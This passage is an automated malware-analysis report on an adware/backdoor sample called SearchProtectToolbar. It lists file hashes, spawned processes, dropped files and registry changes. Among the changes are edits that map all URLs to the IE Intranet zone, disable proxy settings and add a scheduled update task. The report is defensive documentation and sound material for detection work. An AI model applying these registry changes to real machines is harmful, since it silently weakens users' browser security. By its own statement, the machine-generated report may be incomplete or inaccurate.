SearchProtectToolbar_50b2a4e2b0

by malwarelabrobot on August 3rd, 2014 in Malware Descriptions.

not-a-virus:AdWare.Win32.Agent.aeph (Kaspersky), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 50b2a4e2b05f1a96cb606980e48cc21e
SHA1: 2a335a090157ddee7ce0dc3236bb1f8fade44e56
SHA256: 4f6017f9f7cacec1bbe0254f5f65be53532e8da7fb5421aef74469dcfb18e2f0
SSDeep: 6144:vrkT6Y0JQBkQRl7174NpNUM UHs CpgOUaNo8187yAMiC50RjBtC7QIh:vrkT63yRl1uqM gs zOUad87f2gjDuQ0
Size: 291648 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-03-12 10:51:45
Analyzed on: WindowsXP SP3 32-bit

Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

nshBF.exe:2008
putfu.exe:2928
sp-downloader.exe:1716
CltMngSvc.exe:1784
CltMngSvc.exe:1640
nsoBA.tmp:2012
cltmng.exe:996
usetup.exe:3420
cltmngui.exe:1296
rundll32.exe:3116
rundll32.exe:3052
%original file name%.exe:312
nsuB5.exe:516
nsuC3.exe:2608
UpdateSoftware.exe:3512
UpdateSoftware.exe:3456

The Backdoor injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nshBF.exe:2008 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsoC1.tmp\inetc.dll (30 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsoC1.tmp\a.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC1.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyC0.tmp (0 bytes)

The process putfu.exe:2928 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\ProgramUpdater\Assistant.dll (264574 bytes)
%Program Files%\ProgramUpdater\AssistantSvc.dll (174 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (30622 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)

The process sp-downloader.exe:1716 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuB5.exe (11736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB6.tmp (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\MiniStubUtils.dll (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\downloadstub[1] (52 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nstB3.tmp (7189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spstub[1].exe (11736 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inet.txt1_M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nseB6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp\MiniStubUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsjB4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuB5.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsdB2.tmp (0 bytes)

The process CltMngSvc.exe:1784 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\SearchProtect\Main\rep\SystemRepository.dat (9 bytes)

The process nsoBA.tmp:2012 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Program Files%\SearchProtect\UI\dialogs\Images\close-win-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox_checked.png (360 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgUninstall.png (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\v.png (1 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC64.dll (103387 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC32.dll (287458 bytes)
%Program Files%\SearchProtect\EULA.txt (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.html (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-onclick.png (2 bytes)
%Program Files%\SearchProtect\Main\bin\uninstall.exe (33747 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.css (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuC3.exe (5520 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.css (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\menu-selected.png (3 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\x.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button2.png (886 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnSilver.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\main.js (10 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox.png (378 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnClose.png (933 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\protectionDS.js (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\json2.min.js (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgSettings.png (12 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPTool64.exe (50351 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\defaults.js (983 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez.png (256 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\close-win-over-click.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button.png (859 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg.png (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\defaults.js (1 bytes)
%Program Files%\SearchProtect\UI\bin\cltmngui.exe (100378 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\gray-bg.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\style.css (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgSettingsDS.png (9 bytes)
%Program Files%\SearchProtect\Main\bin\CltMngSvc.exe (96792 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\SPtool.dll (81046 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\cltmng.exe (170836 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg-uninstall.png (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\info-icon.png (424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\browsers32.sdb (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\inetc.dll (784 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.js (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button-def.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\SPDialogAPI.js (3 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings.html (8 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bgNotif.png (9 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.html (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.html (12 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\defaults.js (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\uninstall\uninstall.html (5 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Settings-icon.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\bg-with-logo.png (1552 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\radio-button-selected.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-Rollover.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.js (7 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\menu-rollover.png (1 bytes)
%Program Files%\SearchProtect\Main\rep\SystemRepository.dat (2221 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\text-field.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshBF.exe (5520 bytes)
%Program Files%\SearchProtect\UI\dialogs\protection\protection.css (4 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\checkbox_def.png (274 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\icon-win.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\dialogUtils.js (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\btnBlue.png (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\button-bg.png (1 bytes)
%Program Files%\SearchProtect\Main\bin\SPTool.dll (81046 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\rep\UserRepository.dat (478 bytes)
%Program Files%\SearchProtect\UI\dialogs\libs\jquery.1.7.1.min.js (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\C2.tmp (1 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\defaults.js (1 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC32Loader.dll (6584 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\Apply-default.png (2 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.css (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nszBE.tmp (649 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\System.dll (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\Images\hez-selected.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\CT3309297[1] (649 bytes)
%Program Files%\SearchProtect\UI\dialogs\settings\settings.js (11 bytes)
%Program Files%\SearchProtect\UI\dialogs\protectionDS\defaults.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqBC.tmp (698645 bytes)
%Program Files%\SearchProtect\SearchProtect\bin\SPVC64Loader.dll (8560 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp\SPtool.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsgBB.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsbBD.tmp (0 bytes)

The process cltmng.exe:996 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\rep\UserSettings.dat (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\rep\UserRepository.dat (1761 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\SearchProtect\STG\Init_C2.tmp (0 bytes)

The process usetup.exe:3420 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\SoftSafe\UpdateSoftware\UpdateSoftware.exe (33792 bytes)

The process cltmngui.exe:1296 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\SearchProtect\UI\rep\UIRepository.dat (1057 bytes)

The process %original file name%.exe:312 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\general_logo.bmp.tmp (808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.1.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\agup[1].exe (33536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\general_logo[1].bmp (784 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin57DE.bat (84 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe (15 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll (673 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.dat (14184 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\TsuDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3EFFE146.dat (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\2[1].txt (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_2.ini (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\4_3[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\sp-downloader[1].exe (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_3.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\50b2a4e2b05f1a96cb606980e48cc21e.log (3036232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\3[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4_2[1].txt (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x86\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\tpq[1].exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin3D45.bat (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tsu905D28F2.dll (2569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.3.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7306_appcompat.txt (214 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x64\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.2.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.sp-downloader.exe (5064 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.putfu.exe (163934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.usetup.exe (33536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6} (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\down.312.3.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.usetup.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_2.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Custom.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3EFFE146.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\_Setup.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\general_logo.bmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.1.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tsu905D28F2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.putfu.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Readme.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.4_3.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r2.monitorbox1[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin3D45.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x86\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\putfu.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Setup.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\usetup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.sp-downloader.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons\sp-downloader.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA459.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.312.2.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x64\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin57DE.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\Addons (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{735B0250-8ADE-493A-ABD1-C2FCA8B820A6}\x86 (0 bytes)

The process nsuB5.exe:516 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\SPSetup[1].exe (433592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsaB8.tmp (10114 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBA.tmp (433592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\StubUtils.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBA.txt (70 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\inet.txt2_M11D4A9CB-E657-4E77-A7EC-BC51D31B00E8_{0EB51FE4-C139-4E92-9149-3A3205829D57} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nslB7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsqB9.tmp\StubUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoBA.txt (0 bytes)

The process nsuC3.exe:2608 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nskC5.tmp\inetc.dll (30 bytes)

The Backdoor deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nskC5.tmp\a.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nskC5.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsuC4.tmp (0 bytes)

The process UpdateSoftware.exe:3456 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

%WinDir%\Tasks\UpdateSoftware-S-3956077583.job (692 bytes)
%Documents and Settings%\All Users\Application Data\SoftSafe\UpdateSoftware\3956077583.ini (42494 bytes)

Registry activity

The process nshBF.exe:2008 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoC1.tmp\,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE C4 47 58 4B 6B EF 17 22 59 EB 24 D5 C4 58 D8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process putfu.exe:2928 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"27ddcf6f" = "///%"
"8b9e4cbc" = "V/////%%"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"c6c5dd44" = "V/////%%"
"e46c271e" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"InstallDate" = "20130802"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"6185d035" = "VP/h/CP/V//l////"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"340d3099" = "/P////%%"
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5F189DF5-2D05-472B-9091-84D9848AE48B}{6a096ac0}]
"NoModify" = "1"

[HKCU\Software\AppDataLow\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKLM\SOFTWARE\{5F189DF5-2D05-472B-9091-84D9848AE48B}\_6a096ac0\eae10f9d]
